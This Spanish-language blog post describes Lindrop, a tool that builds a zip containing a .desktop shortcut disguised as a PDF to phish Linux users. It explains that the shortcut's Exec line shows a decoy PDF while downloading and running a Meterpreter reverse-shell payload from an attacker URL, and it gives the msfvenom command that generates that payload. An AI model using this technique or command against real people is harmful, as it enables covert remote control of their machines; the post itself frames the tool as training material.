LINDROP – UN VECTOR DE INGENIERÍA SOCIAL PARA LOS OBJETIVOS LINUX

Posted on

Según expertos de seguridad perimetral y seguridad lógica, la ingeniería social es el arte de manipular a las personas para que entreguen información confidencial. Los tipos de información que estos criminales están buscando puede variar, pero cuando los individuos son atacados, los criminales suelen tratar de engañarlos para que les den sus contraseñas o información bancaria, o acceder a su computadora para instalar en secreto software malintencionado que les dará acceso a sus contraseñas e información bancaria, así como el control de su computadora.

Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) “malicioso” que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha.

Los cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.

Básicamente explota la sección “Exec” de un archivo .desktop para:

  1. Descargue un PDF y muéstrelo al usuario.
  2. Descargue y ejecute una linux/x86/meterpreter/reverse_tcppayload

Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas:

Un nombre de salida para el archivo “PDF” (.desktop) que estará en el archivo zip.

lindrop

Un nombre de salida para el archivo almacenado.

lindrop

Una URL de carga útil remota. (http://www.attacker.com/payload) esto se descargará en el directorio / tmp en el equipo de destino. Para este ejemplo, simplemente estamos creando una carga útil con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota  Blackhat 2016’s Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF.

lindrop

En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom.

lindrop

Según los expertos de seguridad lógica, las soluciones de seguridad tradicional no detectaran un ataque de este tipo.

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s